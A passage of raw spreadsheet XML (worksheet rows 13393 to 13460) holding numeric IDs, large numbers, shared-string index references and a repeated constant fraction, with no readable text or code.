      <c r="E13393" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13393" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13394" ht="15.75" customHeight="1">
      <c r="A13394" s="1">
        <v>5586.0</v>
      </c>
      <c r="B13394" s="2">
        <v>4.6076598E7</v>
      </c>
      <c r="C13394" s="2" t="s">
        <v>12887</v>
      </c>
      <c r="D13394" s="2">
        <v>1.0</v>
      </c>
      <c r="E13394" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13394" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13395" ht="15.75" customHeight="1">
      <c r="A13395" s="1">
        <v>5631.0</v>
      </c>
      <c r="B13395" s="2">
        <v>4.6230777E7</v>
      </c>
      <c r="C13395" s="2" t="s">
        <v>12888</v>
      </c>
      <c r="D13395" s="2">
        <v>1.0</v>
      </c>
      <c r="E13395" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13395" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13396" ht="15.75" customHeight="1">
      <c r="A13396" s="1">
        <v>5858.0</v>
      </c>
      <c r="B13396" s="2">
        <v>4.6954391E7</v>
      </c>
      <c r="C13396" s="2" t="s">
        <v>12889</v>
      </c>
      <c r="D13396" s="2">
        <v>1.0</v>
      </c>
      <c r="E13396" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13396" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13397" ht="15.75" customHeight="1">
      <c r="A13397" s="1">
        <v>5952.0</v>
      </c>
      <c r="B13397" s="2">
        <v>4.7285679E7</v>
      </c>
      <c r="C13397" s="2" t="s">
        <v>12890</v>
      </c>
      <c r="D13397" s="2">
        <v>1.0</v>
      </c>
      <c r="E13397" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13397" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13398" ht="15.75" customHeight="1">
      <c r="A13398" s="1">
        <v>6047.0</v>
      </c>
      <c r="B13398" s="2">
        <v>4.7608542E7</v>
      </c>
      <c r="C13398" s="2" t="s">
        <v>12891</v>
      </c>
      <c r="D13398" s="2">
        <v>1.0</v>
      </c>
      <c r="E13398" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13398" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13399" ht="15.75" customHeight="1">
      <c r="A13399" s="1">
        <v>6995.0</v>
      </c>
      <c r="B13399" s="2">
        <v>5.0077526E7</v>
      </c>
      <c r="C13399" s="2" t="s">
        <v>12892</v>
      </c>
      <c r="D13399" s="2">
        <v>1.0</v>
      </c>
      <c r="E13399" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13399" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13400" ht="15.75" customHeight="1">
      <c r="A13400" s="1">
        <v>7048.0</v>
      </c>
      <c r="B13400" s="2">
        <v>5.0159377E7</v>
      </c>
      <c r="C13400" s="2" t="s">
        <v>12893</v>
      </c>
      <c r="D13400" s="2">
        <v>1.0</v>
      </c>
      <c r="E13400" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13400" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13401" ht="15.75" customHeight="1">
      <c r="A13401" s="1">
        <v>7306.0</v>
      </c>
      <c r="B13401" s="2">
        <v>5.0852888E7</v>
      </c>
      <c r="C13401" s="2" t="s">
        <v>12894</v>
      </c>
      <c r="D13401" s="2">
        <v>1.0</v>
      </c>
      <c r="E13401" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13401" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13402" ht="15.75" customHeight="1">
      <c r="A13402" s="1">
        <v>7515.0</v>
      </c>
      <c r="B13402" s="2">
        <v>5.1404468E7</v>
      </c>
      <c r="C13402" s="2" t="s">
        <v>12895</v>
      </c>
      <c r="D13402" s="2">
        <v>1.0</v>
      </c>
      <c r="E13402" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13402" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13403" ht="15.75" customHeight="1">
      <c r="A13403" s="1">
        <v>7676.0</v>
      </c>
      <c r="B13403" s="2">
        <v>5.1906646E7</v>
      </c>
      <c r="C13403" s="2" t="s">
        <v>12896</v>
      </c>
      <c r="D13403" s="2">
        <v>1.0</v>
      </c>
      <c r="E13403" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13403" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13404" ht="15.75" customHeight="1">
      <c r="A13404" s="1">
        <v>7821.0</v>
      </c>
      <c r="B13404" s="2">
        <v>5.2283907E7</v>
      </c>
      <c r="C13404" s="2" t="s">
        <v>12897</v>
      </c>
      <c r="D13404" s="2">
        <v>1.0</v>
      </c>
      <c r="E13404" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13404" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13405" ht="15.75" customHeight="1">
      <c r="A13405" s="1">
        <v>7844.0</v>
      </c>
      <c r="B13405" s="2">
        <v>5.2334225E7</v>
      </c>
      <c r="C13405" s="2" t="s">
        <v>12898</v>
      </c>
      <c r="D13405" s="2">
        <v>1.0</v>
      </c>
      <c r="E13405" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13405" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13406" ht="15.75" customHeight="1">
      <c r="A13406" s="1">
        <v>7930.0</v>
      </c>
      <c r="B13406" s="2">
        <v>5.2578727E7</v>
      </c>
      <c r="C13406" s="2" t="s">
        <v>12899</v>
      </c>
      <c r="D13406" s="2">
        <v>1.0</v>
      </c>
      <c r="E13406" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13406" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13407" ht="15.75" customHeight="1">
      <c r="A13407" s="1">
        <v>7988.0</v>
      </c>
      <c r="B13407" s="2">
        <v>5.2748909E7</v>
      </c>
      <c r="C13407" s="2" t="s">
        <v>12900</v>
      </c>
      <c r="D13407" s="2">
        <v>1.0</v>
      </c>
      <c r="E13407" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13407" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13408" ht="15.75" customHeight="1">
      <c r="A13408" s="1">
        <v>8014.0</v>
      </c>
      <c r="B13408" s="2">
        <v>5.2786827E7</v>
      </c>
      <c r="C13408" s="2" t="s">
        <v>12901</v>
      </c>
      <c r="D13408" s="2">
        <v>1.0</v>
      </c>
      <c r="E13408" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13408" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13409" ht="15.75" customHeight="1">
      <c r="A13409" s="1">
        <v>8208.0</v>
      </c>
      <c r="B13409" s="2">
        <v>5.3306999E7</v>
      </c>
      <c r="C13409" s="2" t="s">
        <v>12902</v>
      </c>
      <c r="D13409" s="2">
        <v>1.0</v>
      </c>
      <c r="E13409" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13409" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13410" ht="15.75" customHeight="1">
      <c r="A13410" s="1">
        <v>8344.0</v>
      </c>
      <c r="B13410" s="2">
        <v>5.3724265E7</v>
      </c>
      <c r="C13410" s="2" t="s">
        <v>12903</v>
      </c>
      <c r="D13410" s="2">
        <v>1.0</v>
      </c>
      <c r="E13410" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13410" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13411" ht="15.75" customHeight="1">
      <c r="A13411" s="1">
        <v>8429.0</v>
      </c>
      <c r="B13411" s="2">
        <v>5.3938613E7</v>
      </c>
      <c r="C13411" s="2" t="s">
        <v>12904</v>
      </c>
      <c r="D13411" s="2">
        <v>1.0</v>
      </c>
      <c r="E13411" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13411" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13412" ht="15.75" customHeight="1">
      <c r="A13412" s="1">
        <v>8562.0</v>
      </c>
      <c r="B13412" s="2">
        <v>5.4174058E7</v>
      </c>
      <c r="C13412" s="2" t="s">
        <v>12905</v>
      </c>
      <c r="D13412" s="2">
        <v>1.0</v>
      </c>
      <c r="E13412" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13412" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13413" ht="15.75" customHeight="1">
      <c r="A13413" s="1">
        <v>8857.0</v>
      </c>
      <c r="B13413" s="2">
        <v>5.4728193E7</v>
      </c>
      <c r="C13413" s="2" t="s">
        <v>12906</v>
      </c>
      <c r="D13413" s="2">
        <v>1.0</v>
      </c>
      <c r="E13413" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13413" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13414" ht="15.75" customHeight="1">
      <c r="A13414" s="1">
        <v>8956.0</v>
      </c>
      <c r="B13414" s="2">
        <v>5.4924984E7</v>
      </c>
      <c r="C13414" s="2" t="s">
        <v>12907</v>
      </c>
      <c r="D13414" s="2">
        <v>1.0</v>
      </c>
      <c r="E13414" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13414" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13415" ht="15.75" customHeight="1">
      <c r="A13415" s="1">
        <v>9193.0</v>
      </c>
      <c r="B13415" s="2">
        <v>5.5394838E7</v>
      </c>
      <c r="C13415" s="2" t="s">
        <v>12908</v>
      </c>
      <c r="D13415" s="2">
        <v>1.0</v>
      </c>
      <c r="E13415" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13415" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13416" ht="15.75" customHeight="1">
      <c r="A13416" s="1">
        <v>9431.0</v>
      </c>
      <c r="B13416" s="2">
        <v>5.5797687E7</v>
      </c>
      <c r="C13416" s="2" t="s">
        <v>12909</v>
      </c>
      <c r="D13416" s="2">
        <v>1.0</v>
      </c>
      <c r="E13416" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13416" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13417" ht="15.75" customHeight="1">
      <c r="A13417" s="1">
        <v>9468.0</v>
      </c>
      <c r="B13417" s="2">
        <v>5.585532E7</v>
      </c>
      <c r="C13417" s="2" t="s">
        <v>12910</v>
      </c>
      <c r="D13417" s="2">
        <v>1.0</v>
      </c>
      <c r="E13417" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13417" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13418" ht="15.75" customHeight="1">
      <c r="A13418" s="1">
        <v>9596.0</v>
      </c>
      <c r="B13418" s="2">
        <v>5.6128504E7</v>
      </c>
      <c r="C13418" s="2" t="s">
        <v>12911</v>
      </c>
      <c r="D13418" s="2">
        <v>1.0</v>
      </c>
      <c r="E13418" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13418" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13419" ht="15.75" customHeight="1">
      <c r="A13419" s="1">
        <v>9826.0</v>
      </c>
      <c r="B13419" s="2">
        <v>5.663441E7</v>
      </c>
      <c r="C13419" s="2" t="s">
        <v>12912</v>
      </c>
      <c r="D13419" s="2">
        <v>1.0</v>
      </c>
      <c r="E13419" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13419" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13420" ht="15.75" customHeight="1">
      <c r="A13420" s="1">
        <v>10036.0</v>
      </c>
      <c r="B13420" s="2">
        <v>5.7060719E7</v>
      </c>
      <c r="C13420" s="2" t="s">
        <v>12913</v>
      </c>
      <c r="D13420" s="2">
        <v>1.0</v>
      </c>
      <c r="E13420" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13420" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13421" ht="15.75" customHeight="1">
      <c r="A13421" s="1">
        <v>10446.0</v>
      </c>
      <c r="B13421" s="2">
        <v>1.0518006E7</v>
      </c>
      <c r="C13421" s="2" t="s">
        <v>12914</v>
      </c>
      <c r="D13421" s="2">
        <v>1.0</v>
      </c>
      <c r="E13421" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13421" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13422" ht="15.75" customHeight="1">
      <c r="A13422" s="1">
        <v>11071.0</v>
      </c>
      <c r="B13422" s="2">
        <v>1.8369715E7</v>
      </c>
      <c r="C13422" s="2" t="s">
        <v>12915</v>
      </c>
      <c r="D13422" s="2">
        <v>1.0</v>
      </c>
      <c r="E13422" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13422" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13423" ht="15.75" customHeight="1">
      <c r="A13423" s="1">
        <v>12016.0</v>
      </c>
      <c r="B13423" s="2">
        <v>2.6044785E7</v>
      </c>
      <c r="C13423" s="2" t="s">
        <v>12916</v>
      </c>
      <c r="D13423" s="2">
        <v>1.0</v>
      </c>
      <c r="E13423" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13423" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13424" ht="15.75" customHeight="1">
      <c r="A13424" s="1">
        <v>12202.0</v>
      </c>
      <c r="B13424" s="2">
        <v>2.7500534E7</v>
      </c>
      <c r="C13424" s="2" t="s">
        <v>12917</v>
      </c>
      <c r="D13424" s="2">
        <v>1.0</v>
      </c>
      <c r="E13424" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13424" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13425" ht="15.75" customHeight="1">
      <c r="A13425" s="1">
        <v>12608.0</v>
      </c>
      <c r="B13425" s="2">
        <v>3.0155119E7</v>
      </c>
      <c r="C13425" s="2" t="s">
        <v>12918</v>
      </c>
      <c r="D13425" s="2">
        <v>1.0</v>
      </c>
      <c r="E13425" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13425" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13426" ht="15.75" customHeight="1">
      <c r="A13426" s="1">
        <v>12845.0</v>
      </c>
      <c r="B13426" s="2">
        <v>3.1767259E7</v>
      </c>
      <c r="C13426" s="2" t="s">
        <v>12919</v>
      </c>
      <c r="D13426" s="2">
        <v>1.0</v>
      </c>
      <c r="E13426" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13426" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13427" ht="15.75" customHeight="1">
      <c r="A13427" s="1">
        <v>12910.0</v>
      </c>
      <c r="B13427" s="2">
        <v>3.2155868E7</v>
      </c>
      <c r="C13427" s="2" t="s">
        <v>12920</v>
      </c>
      <c r="D13427" s="2">
        <v>1.0</v>
      </c>
      <c r="E13427" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13427" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13428" ht="15.75" customHeight="1">
      <c r="A13428" s="1">
        <v>12935.0</v>
      </c>
      <c r="B13428" s="2">
        <v>3.2356888E7</v>
      </c>
      <c r="C13428" s="2" t="s">
        <v>12921</v>
      </c>
      <c r="D13428" s="2">
        <v>1.0</v>
      </c>
      <c r="E13428" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13428" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13429" ht="15.75" customHeight="1">
      <c r="A13429" s="1">
        <v>13464.0</v>
      </c>
      <c r="B13429" s="2">
        <v>3.5201419E7</v>
      </c>
      <c r="C13429" s="2" t="s">
        <v>12922</v>
      </c>
      <c r="D13429" s="2">
        <v>1.0</v>
      </c>
      <c r="E13429" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13429" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13430" ht="15.75" customHeight="1">
      <c r="A13430" s="1">
        <v>13828.0</v>
      </c>
      <c r="B13430" s="2">
        <v>3.6769999E7</v>
      </c>
      <c r="C13430" s="2" t="s">
        <v>12923</v>
      </c>
      <c r="D13430" s="2">
        <v>1.0</v>
      </c>
      <c r="E13430" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13430" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13431" ht="15.75" customHeight="1">
      <c r="A13431" s="1">
        <v>14106.0</v>
      </c>
      <c r="B13431" s="2">
        <v>3.7757328E7</v>
      </c>
      <c r="C13431" s="2" t="s">
        <v>12924</v>
      </c>
      <c r="D13431" s="2">
        <v>1.0</v>
      </c>
      <c r="E13431" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13431" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13432" ht="15.75" customHeight="1">
      <c r="A13432" s="1">
        <v>14895.0</v>
      </c>
      <c r="B13432" s="2">
        <v>4.1138553E7</v>
      </c>
      <c r="C13432" s="2" t="s">
        <v>12925</v>
      </c>
      <c r="D13432" s="2">
        <v>1.0</v>
      </c>
      <c r="E13432" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13432" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13433" ht="15.75" customHeight="1">
      <c r="A13433" s="1">
        <v>15049.0</v>
      </c>
      <c r="B13433" s="2">
        <v>4.1614821E7</v>
      </c>
      <c r="C13433" s="2" t="s">
        <v>12926</v>
      </c>
      <c r="D13433" s="2">
        <v>1.0</v>
      </c>
      <c r="E13433" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13433" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13434" ht="15.75" customHeight="1">
      <c r="A13434" s="1">
        <v>15119.0</v>
      </c>
      <c r="B13434" s="2">
        <v>4.1880091E7</v>
      </c>
      <c r="C13434" s="2" t="s">
        <v>12927</v>
      </c>
      <c r="D13434" s="2">
        <v>1.0</v>
      </c>
      <c r="E13434" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13434" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13435" ht="15.75" customHeight="1">
      <c r="A13435" s="1">
        <v>15133.0</v>
      </c>
      <c r="B13435" s="2">
        <v>4.1903433E7</v>
      </c>
      <c r="C13435" s="2" t="s">
        <v>12928</v>
      </c>
      <c r="D13435" s="2">
        <v>1.0</v>
      </c>
      <c r="E13435" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13435" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13436" ht="15.75" customHeight="1">
      <c r="A13436" s="1">
        <v>15301.0</v>
      </c>
      <c r="B13436" s="2">
        <v>4.2460266E7</v>
      </c>
      <c r="C13436" s="2" t="s">
        <v>12929</v>
      </c>
      <c r="D13436" s="2">
        <v>1.0</v>
      </c>
      <c r="E13436" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13436" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13437" ht="15.75" customHeight="1">
      <c r="A13437" s="1">
        <v>15446.0</v>
      </c>
      <c r="B13437" s="2">
        <v>4.3029283E7</v>
      </c>
      <c r="C13437" s="2" t="s">
        <v>12930</v>
      </c>
      <c r="D13437" s="2">
        <v>1.0</v>
      </c>
      <c r="E13437" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13437" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13438" ht="15.75" customHeight="1">
      <c r="A13438" s="1">
        <v>15995.0</v>
      </c>
      <c r="B13438" s="2">
        <v>4.4959033E7</v>
      </c>
      <c r="C13438" s="2" t="s">
        <v>12931</v>
      </c>
      <c r="D13438" s="2">
        <v>1.0</v>
      </c>
      <c r="E13438" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13438" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13439" ht="15.75" customHeight="1">
      <c r="A13439" s="1">
        <v>16553.0</v>
      </c>
      <c r="B13439" s="2">
        <v>4.6828406E7</v>
      </c>
      <c r="C13439" s="2" t="s">
        <v>12932</v>
      </c>
      <c r="D13439" s="2">
        <v>1.0</v>
      </c>
      <c r="E13439" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13439" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13440" ht="15.75" customHeight="1">
      <c r="A13440" s="1">
        <v>16573.0</v>
      </c>
      <c r="B13440" s="2">
        <v>4.6905827E7</v>
      </c>
      <c r="C13440" s="2" t="s">
        <v>12933</v>
      </c>
      <c r="D13440" s="2">
        <v>1.0</v>
      </c>
      <c r="E13440" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13440" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13441" ht="15.75" customHeight="1">
      <c r="A13441" s="1">
        <v>16715.0</v>
      </c>
      <c r="B13441" s="2">
        <v>4.7448328E7</v>
      </c>
      <c r="C13441" s="2" t="s">
        <v>12934</v>
      </c>
      <c r="D13441" s="2">
        <v>1.0</v>
      </c>
      <c r="E13441" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13441" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13442" ht="15.75" customHeight="1">
      <c r="A13442" s="1">
        <v>16792.0</v>
      </c>
      <c r="B13442" s="2">
        <v>4.7763876E7</v>
      </c>
      <c r="C13442" s="2" t="s">
        <v>12910</v>
      </c>
      <c r="D13442" s="2">
        <v>1.0</v>
      </c>
      <c r="E13442" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13442" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13443" ht="15.75" customHeight="1">
      <c r="A13443" s="1">
        <v>17226.0</v>
      </c>
      <c r="B13443" s="2">
        <v>4.9066306E7</v>
      </c>
      <c r="C13443" s="2" t="s">
        <v>12935</v>
      </c>
      <c r="D13443" s="2">
        <v>1.0</v>
      </c>
      <c r="E13443" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13443" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13444" ht="15.75" customHeight="1">
      <c r="A13444" s="1">
        <v>17239.0</v>
      </c>
      <c r="B13444" s="2">
        <v>4.907855E7</v>
      </c>
      <c r="C13444" s="2" t="s">
        <v>12936</v>
      </c>
      <c r="D13444" s="2">
        <v>1.0</v>
      </c>
      <c r="E13444" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13444" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13445" ht="15.75" customHeight="1">
      <c r="A13445" s="1">
        <v>17303.0</v>
      </c>
      <c r="B13445" s="2">
        <v>4.9276492E7</v>
      </c>
      <c r="C13445" s="2" t="s">
        <v>12937</v>
      </c>
      <c r="D13445" s="2">
        <v>1.0</v>
      </c>
      <c r="E13445" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13445" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13446" ht="15.75" customHeight="1">
      <c r="A13446" s="1">
        <v>17329.0</v>
      </c>
      <c r="B13446" s="2">
        <v>4.9368055E7</v>
      </c>
      <c r="C13446" s="2" t="s">
        <v>12938</v>
      </c>
      <c r="D13446" s="2">
        <v>1.0</v>
      </c>
      <c r="E13446" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13446" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13447" ht="15.75" customHeight="1">
      <c r="A13447" s="1">
        <v>17688.0</v>
      </c>
      <c r="B13447" s="2">
        <v>5.0505056E7</v>
      </c>
      <c r="C13447" s="2" t="s">
        <v>12939</v>
      </c>
      <c r="D13447" s="2">
        <v>1.0</v>
      </c>
      <c r="E13447" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13447" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13448" ht="15.75" customHeight="1">
      <c r="A13448" s="1">
        <v>17834.0</v>
      </c>
      <c r="B13448" s="2">
        <v>5.0928864E7</v>
      </c>
      <c r="C13448" s="2" t="s">
        <v>12940</v>
      </c>
      <c r="D13448" s="2">
        <v>1.0</v>
      </c>
      <c r="E13448" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13448" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13449" ht="15.75" customHeight="1">
      <c r="A13449" s="1">
        <v>17893.0</v>
      </c>
      <c r="B13449" s="2">
        <v>5.1055811E7</v>
      </c>
      <c r="C13449" s="2" t="s">
        <v>12941</v>
      </c>
      <c r="D13449" s="2">
        <v>1.0</v>
      </c>
      <c r="E13449" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13449" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13450" ht="15.75" customHeight="1">
      <c r="A13450" s="1">
        <v>18143.0</v>
      </c>
      <c r="B13450" s="2">
        <v>5.1834194E7</v>
      </c>
      <c r="C13450" s="2" t="s">
        <v>12941</v>
      </c>
      <c r="D13450" s="2">
        <v>1.0</v>
      </c>
      <c r="E13450" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13450" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13451" ht="15.75" customHeight="1">
      <c r="A13451" s="1">
        <v>18222.0</v>
      </c>
      <c r="B13451" s="2">
        <v>5.2106152E7</v>
      </c>
      <c r="C13451" s="2" t="s">
        <v>12942</v>
      </c>
      <c r="D13451" s="2">
        <v>1.0</v>
      </c>
      <c r="E13451" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13451" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13452" ht="15.75" customHeight="1">
      <c r="A13452" s="1">
        <v>18382.0</v>
      </c>
      <c r="B13452" s="2">
        <v>5.2583656E7</v>
      </c>
      <c r="C13452" s="2" t="s">
        <v>12943</v>
      </c>
      <c r="D13452" s="2">
        <v>1.0</v>
      </c>
      <c r="E13452" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13452" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13453" ht="15.75" customHeight="1">
      <c r="A13453" s="1">
        <v>18676.0</v>
      </c>
      <c r="B13453" s="2">
        <v>5.3561707E7</v>
      </c>
      <c r="C13453" s="2" t="s">
        <v>12944</v>
      </c>
      <c r="D13453" s="2">
        <v>1.0</v>
      </c>
      <c r="E13453" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13453" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13454" ht="15.75" customHeight="1">
      <c r="A13454" s="1">
        <v>18752.0</v>
      </c>
      <c r="B13454" s="2">
        <v>5.3784846E7</v>
      </c>
      <c r="C13454" s="2" t="s">
        <v>12945</v>
      </c>
      <c r="D13454" s="2">
        <v>1.0</v>
      </c>
      <c r="E13454" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13454" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13455" ht="15.75" customHeight="1">
      <c r="A13455" s="1">
        <v>19020.0</v>
      </c>
      <c r="B13455" s="2">
        <v>5.4529378E7</v>
      </c>
      <c r="C13455" s="2" t="s">
        <v>12946</v>
      </c>
      <c r="D13455" s="2">
        <v>1.0</v>
      </c>
      <c r="E13455" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13455" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13456" ht="15.75" customHeight="1">
      <c r="A13456" s="1">
        <v>19606.0</v>
      </c>
      <c r="B13456" s="2">
        <v>5.6185311E7</v>
      </c>
      <c r="C13456" s="2" t="s">
        <v>12947</v>
      </c>
      <c r="D13456" s="2">
        <v>1.0</v>
      </c>
      <c r="E13456" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13456" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13457" ht="15.75" customHeight="1">
      <c r="A13457" s="1">
        <v>19939.0</v>
      </c>
      <c r="B13457" s="2">
        <v>5.7447899E7</v>
      </c>
      <c r="C13457" s="2" t="s">
        <v>12948</v>
      </c>
      <c r="D13457" s="2">
        <v>1.0</v>
      </c>
      <c r="E13457" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13457" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13458" ht="15.75" customHeight="1">
      <c r="A13458" s="1">
        <v>20540.0</v>
      </c>
      <c r="B13458" s="2">
        <v>1.3316175E7</v>
      </c>
      <c r="C13458" s="2" t="s">
        <v>12949</v>
      </c>
      <c r="D13458" s="2">
        <v>1.0</v>
      </c>
      <c r="E13458" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13458" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13459" ht="15.75" customHeight="1">
      <c r="A13459" s="1">
        <v>20817.0</v>
      </c>
      <c r="B13459" s="2">
        <v>1.5365676E7</v>
      </c>
      <c r="C13459" s="2" t="s">
        <v>12950</v>
      </c>
      <c r="D13459" s="2">
        <v>1.0</v>
      </c>
      <c r="E13459" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13459" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13460" ht="15.75" customHeight="1">
      <c r="A13460" s="1">
        <v>21658.0</v>
      </c>
      <c r="B13460" s="2">
        <v>2.4976659E7</v>
      </c>
      <c r="C13460" s="2" t="s">
        <v>12951</v>
      </c>
      <c r="D13460" s="2">
        <v>1.0</v>
